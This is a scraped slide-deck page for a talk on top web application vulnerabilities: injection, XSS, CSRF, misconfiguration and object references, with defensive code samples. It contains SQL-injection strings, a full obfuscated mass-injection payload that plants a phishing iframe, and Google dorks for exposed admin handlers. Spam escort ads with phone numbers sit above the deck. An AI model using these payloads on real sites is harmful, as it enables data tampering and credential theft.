CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 

Top web apps security vulnerabilities

  • 2. Top Web Apps Security Vulnerabilities Aleksandar Bozinovski Technical Lead, Seavus
  • 5. Agenda Importance of Web Security HTTP, Sessions, Cookies Injection Cross Site Scripting (XSS) Cross-Site Request Forgery (CSRF) Security Misconfiguration Insecure Direct Object References
  • 6. Famous Quote “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis. Alan Jay Perlis was a computer scientist known for his pioneering work in programming languages, and is the first recipient of the Turing Award.
  • 7. Bobby Tables
    string query = "INSERT INTO Students VALUES ('" + txtName.Text + "','" + txtSSN.Text + "')";
    // Attack: Robert'); DROP TABLE Students;--
    // Resulting SQL: INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')
  • 10. HTTP Hypertext Transport Protocol – Language of the Web. Protocol used for communication between web browsers and web servers – Standard RFC 1945, 1996 URL – Uniform Resource Identifier Methods – GET, POST, PUT, HEAD, OPTIONS
  • 11. Statelessness, Cookies – By its nature HTTP is said to be a stateless protocol, i.e. from one web page to the next there is nothing in the protocol that allows a web program to maintain program “state” (like a desktop program). – “State” can be maintained by “witchery” or “trickery” if it is needed. – Cookie: a piece of data sent from a website and stored in a user's web browser while the user is browsing that website. – The server sets the cookie in a response. – The client includes the cookies in the HTTP header of subsequent requests to the server. – Example cookie: ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr
  • 14. Injection OWASP Definition – Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
  • 16. SQL Injection happens when we create a query but fail to validate and sanitize the untrusted input data.
  • 17. SQL Queries – Queries constructed by concatenating strings are vulnerable to SQL Injection.
    var categoryId = Request.QueryString["CategoryId"];
    var sql = "SELECT * FROM Products WHERE CategoryID=" + categoryId;
    // If we enter "7 OR 1=1" in the query string we end up with:
    //   SELECT * FROM Products WHERE CategoryID=7 OR 1=1
    // An attacker can use ; to terminate the current command and run their own commands:
    //   SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products
  • 18. Prevent SQL Injection – Validate untrusted data: if the input is supposed to be a number, convert it to a number or check it with a regex. – Use parameterized SQL queries instead of string soup. – Using stored procedures is also a good idea, but keep in mind that stored procedures are vulnerable if they concatenate strings on their own. – Use ORMs (like Entity Framework) that are inherently resistant to SQL Injection.
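The concatenated query from slide 17 next to the validated, parameterized version from slide 18, run against an in-memory SQLite table. This is an added example in Python, not the deck's C# (which would use SqlCommand parameters for the same effect); the product rows are constructed for the example.

```python
# Added example (not the deck's code): slide 17's concatenated query beside
# the validated, parameterized version slide 18 recommends, run against an
# in-memory SQLite table. Note: sqlite3's execute() refuses multi-statement
# batches, so the "; DROP TABLE" variant from slide 17 cannot be reproduced
# here, although SQL Server would run such a batch.
import re
import sqlite3

# Constructed sample rows: (ProductID, ProductName, CategoryID)
SAMPLE_PRODUCTS = [
    (1, "Chai", 1), (2, "Chang", 1), (3, "Aniseed Syrup", 2),
    (4, "Cajun Seasoning", 2), (5, "Gumbo Mix", 2), (6, "Pears", 7),
]


def open_db() -> sqlite3.Connection:
    """Create the Products table the slide queries and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Products (ProductID INTEGER PRIMARY KEY, "
        "ProductName TEXT, CategoryID INTEGER)"
    )
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def products_concat(conn: sqlite3.Connection, category_id: str) -> list[str]:
    """Slide 17's pattern: the raw query-string value is pasted into the SQL."""
    sql = "SELECT ProductName FROM Products WHERE CategoryID=" + category_id
    return [row[0] for row in conn.execute(sql)]


def products_param(conn: sqlite3.Connection, category_id: str) -> list[str]:
    """Slide 18's advice: check that the input really is a number, then bind
    it as a parameter so it can never alter the structure of the query."""
    if not re.fullmatch(r"\d{1,9}", category_id):
        raise ValueError("CategoryId must be a positive integer")
    sql = "SELECT ProductName FROM Products WHERE CategoryID=?"
    return [row[0] for row in conn.execute(sql, (int(category_id),))]


if __name__ == "__main__":
    db = open_db()
    print("normal:  ", products_concat(db, "7"))         # ['Pears']
    print("injected:", products_concat(db, "7 OR 1=1"))  # every product
    print("fixed:   ", products_param(db, "7"))          # ['Pears']
    try:
        products_param(db, "7 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```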
  • 19. Other Injection Attacks
    – LDAP Injection: string ldapSearch = "(cn=" + txtSearchTerm.Text + ")";
    – Dynamic LINQ Injection: string where = "Table.Contains(\"" + search + "\")";
    – XPath Injection: string loginExpression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
  • 20. Cross-Site Scripting (XSS) OWASP Definition – XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 22. Types of XSS Attacks Stored XSS • Stored attacks are those where the injected code is permanently stored on the target servers. • Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved. Reflected XSS • Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result. • Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server.
  • 23. Built-in protection – Modern browsers and servers employ many first-line defenses against XSS by default: – ASP.NET Request Validation, present since version 2.0. In ASP.NET 4.0 it is enabled for all types of requests, not just pages. To turn it off we must revert to the older mode with requestValidationMode="2.0". – Output encoding: the MVC Razor view engine encodes everything by default. XSS is possible only if we use @Html.Raw().
  • 24. Built-in protection – AntiXSS library is by default included in ASP.NET Web Forms 4.5. Can be retrofitted on older web apps. – Google Chrome has built-in anti XSS protection
  • 25. Cross-Site Request Forgery OWASP Definition – A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
  • 27. How CSRF works – Authenticated sessions are persisted via cookies; the cookie is sent with every request to the domain. – The attacking site recreates a legitimately formed request to the target site, although the request carries a malicious payload (query string parameters or post data). – The victim’s browser is tricked into issuing the request; for all intents and purposes, the target website views it as a legitimate request.
  • 28. CSRF Tokens – To mitigate this risk, we can add randomness via a CSRF token. – A token is a random string known both to the legitimate page where the form is and to the browser via a cookie.
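The token scheme slide 28 describes, as an added Python example that is not the deck's or ASP.NET's own code: one random, server-signed value is placed both in a hidden form field and in a cookie, and a POST is accepted only when the two match. The cookie and field names and the per-process key are assumptions.

```python
# Added example (not the deck's code): the CSRF token from slide 28. The
# token is HMAC-signed with a server key so an attacker cannot mint one, and
# the request is accepted only when cookie and hidden field carry the same
# signed token. Cookie/field names are assumptions.
import hmac
import secrets

COOKIE_NAME = "__CsrfToken"
FIELD_NAME = "__CsrfToken"
SERVER_KEY = secrets.token_bytes(32)  # constructed per process; load from config in practice


def _sign(nonce: str) -> str:
    return hmac.new(SERVER_KEY, nonce.encode(), "sha256").hexdigest()


def issue_csrf_token() -> str:
    """Random nonce plus its signature; issued when the form page is rendered."""
    nonce = secrets.token_urlsafe(24)          # base64url alphabet, never contains '.'
    return f"{nonce}.{_sign(nonce)}"


def _well_formed(token: str) -> bool:
    """True only for tokens this server signed (constant-time comparison)."""
    nonce, _, sig = token.partition(".")
    return bool(nonce) and hmac.compare_digest(sig.encode(), _sign(nonce).encode())


def render_form(token: str) -> str:
    """The legitimate page embeds the token in a hidden input."""
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="{FIELD_NAME}" value="{token}">'
        '<input name="amount"><button>Send</button></form>'
    )


def set_cookie_header(token: str) -> str:
    """The same token goes to the browser as a cookie. HttpOnly is fine here
    because the server renders the matching hidden field itself."""
    return f"Set-Cookie: {COOKIE_NAME}={token}; Path=/; HttpOnly; SameSite=Strict"


def validate_csrf(cookies: dict, form: dict) -> bool:
    """Run before handling any state-changing POST."""
    cookie_tok = cookies.get(COOKIE_NAME, "")
    form_tok = form.get(FIELD_NAME, "")
    if not (_well_formed(cookie_tok) and _well_formed(form_tok)):
        return False
    return hmac.compare_digest(cookie_tok.encode(), form_tok.encode())


def simulate() -> tuple[bool, bool]:
    """Legitimate submit vs. the forged request slide 27 describes."""
    token = issue_csrf_token()
    victim_cookies = {COOKIE_NAME: token}            # browser stored the cookie
    # Legitimate: the form the server rendered carries the same token.
    legit_form = {FIELD_NAME: token, "amount": "10"}
    # Forged: the attacking site's form makes the browser send the cookie
    # automatically, but cannot read it (same-origin policy), so the hidden
    # field is missing and validation fails.
    forged_form = {"amount": "10000"}
    return validate_csrf(victim_cookies, legit_form), validate_csrf(victim_cookies, forged_form)
```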
  • 29. Security Misconfiguration OWASP Definition – Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
  • 31. Keep up to date Your servers – Windows Server 2012 is arguably more secure than Windows Server 2003 Client browsers (if applicable) – Modern browsers include built-in defenses against most prevalent attacks Keep your frameworks up to date
  • 32. Set Custom Errors, hide YSOD
  • 34. Also don’t forget to turn off – ELMAH: cases with unprotected ELMAH handlers are notorious. Googledork: inurl:"elmah.axd" – DEBUG: performance penalties; although not a direct security risk on its own, beware of #if DEBUG statements that can disclose information.
  • 35. Also don’t forget to turn off Script execution on folders where not needed – Usually folders where various documents or uploaded files are kept, unless you use App_Data folder. HTTP Access to Logs – Log files can disclose many sensitive details about your web app. It’s best to keep them outside of the web app root. If not possible at least keep them in App_Data.
  • 36. Insecure Direct Object References OWASP Definition – A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
  • 38. Direct Object References – A direct object reference is an observable key used to identify an individual record in database • http://northwind.com/Products?catId=1 • http://northwind.com/Products?catId=3 • http://northwind.com/Products?catId=8
  • 39. Direct Object References – Another example • http://webapp.com/Download?f=DSC01031.JPG • http://webapp.com/Download?f=DSC01032.JPG • http://webapp.com/Download?f=DSC01033.JPG
  • 40. Prevention Implementing proper access control – Validate user data – Implement security checks before using object reference Access via undiscoverable surrogate keys – Integer and natural string types are vulnerable to enumeration – A surrogate key that is not pattern-based can add further obfuscation • A GUID is a good example – However, it is security through obscurity
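Both defences from slide 40 applied to the Download?f=DSC01031.JPG case of slide 39, as an added Python example (not the deck's code): a GUID surrogate key replaces the guessable file name, and an ownership check runs before the reference is used. The in-memory "table", user names and helper names are constructed for the example.

```python
# Added example (not the deck's code): slide 40's two defences for the
# Download?f=... case. Keys are GUIDs (no enumeration of neighbouring
# values) and the record's owner is checked before the reference is used.
import uuid
from dataclasses import dataclass


@dataclass(frozen=True)
class StoredFile:
    owner: str      # user who uploaded it
    filename: str   # original name, e.g. DSC01031.JPG; never taken from the URL


FILES: dict[str, StoredFile] = {}   # constructed in-memory table: key -> record


def store_file(owner: str, filename: str) -> str:
    """Register an upload and return the random key the user will see in URLs."""
    key = str(uuid.uuid4())
    FILES[key] = StoredFile(owner, filename)
    return key


def download_insecure(key: str) -> str:
    """The vulnerable handler: whatever reference the client sends is served."""
    return FILES[key].filename


def download(current_user: str, key: str) -> str:
    """Hardened handler: validate the key's shape, then check that the record
    belongs to the caller *before* using it. Missing and foreign records get
    the same answer so the endpoint does not reveal which keys exist."""
    try:
        uuid.UUID(key)
    except ValueError:
        raise PermissionError("not found") from None
    record = FILES.get(key)
    if record is None or record.owner != current_user:
        raise PermissionError("not found")
    return record.filename


def demo() -> tuple[str, bool, bool]:
    """Alice's own download succeeds; Bob reusing Alice's key is refused."""
    key = store_file("alice", "DSC01031.JPG")
    own = download("alice", key)
    try:
        download("bob", key)
        bob_blocked = False
    except PermissionError:
        bob_blocked = True
    # The random key alone is obscurity, as the slide says: without the owner
    # check the insecure handler serves any key that leaks (mail, logs, referer).
    leaked_served = download_insecure(key) == "DSC01031.JPG"
    return own, bob_blocked, leaked_served
```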
  • 41. Real example: phishing with obfuscated SQL injection and XSS
    --1. The malicious query appends script to all text values in all tables in the database
    DECLARE @T varchar(255),@C varchar(4000)
    DECLARE Table_Cursor CURSOR FOR
      select a.name,b.name from sysobjects a,syscolumns b
      where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
        and b.name not like '%username%' and b.name not like '%password%'
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + '' <script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like ''%http://codecamp.local/EvilSite/Login.aspx%''');
      FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
  • 42. Real example: phishing with obfuscated SQL injection and XSS
    --2. The query is written as a one-line string
    'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor'
    --3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters.
    SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;z-index:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true" /></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX))
    -- result: 0x… (hex literal elided)
    -- Final attack is: a' OR 1=1; DECLARE @S CHAR(4000);SET @S = CAST(0x… as CHAR(4000));EXEC(@S)--
  • 44. Complete electronic evaluation forms on the computers in the hall and enter to win! – Infragistics Ultimate – Telerik DevCraft – JetBrains .NET tools – Semos training vouchers – Pluralsight subscriptions – and many more…

Editor's Notes

  1. A big part of web application security testing involves attempts to force an application to function in a way it was not intended to. Alan Jay Perlis was a computer scientist known for his pioneering work in programming languages and the first recipient of the Turing Award (the Nobel Prize of computing).
  2. Code: string query = "INSERT INTO Students VALUES ('" + txtStudentName.Text + "','" + txtSSN.Text + "')"; Attack: Robert'); DROP TABLE Students;-- Result: INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;--','12345')
  3. q = "INSERT INTO Students VALUES ('" + txtStudentName.Text + "')"; Robert'); DROP TABLE Students;--
  4. http://www.isi.edu/in-notes/rfc1945.txt
  5. C:\Users\codecamp\AppData\Roaming\Microsoft\Windows\Cookies\Low
  6. Enter OWASP, the Open Web Application Security Project, a non-profit charitable organisation established with the express purpose of promoting secure web application design. OWASP was started on September 9, 2001 By Mark Curphey and Dennis Groves. Since late 2003, Jeff Williams served as the volunteer Chair of OWASP until September 2011. The current chair is Michael Coates, and vice chair is Eoin Keary. The OWASP Foundation, a 501(c)(3) organization (in the USA) was established in 2004 and supports the OWASP infrastructure and projects.
  7. Keep in mind that Trace.axd usually is not protected by authentication. Search on google for: inurl:trace.axd
  8. Googledork: Search on google inurl:elmah.axd
  9. Search on google inurl:elmah.axd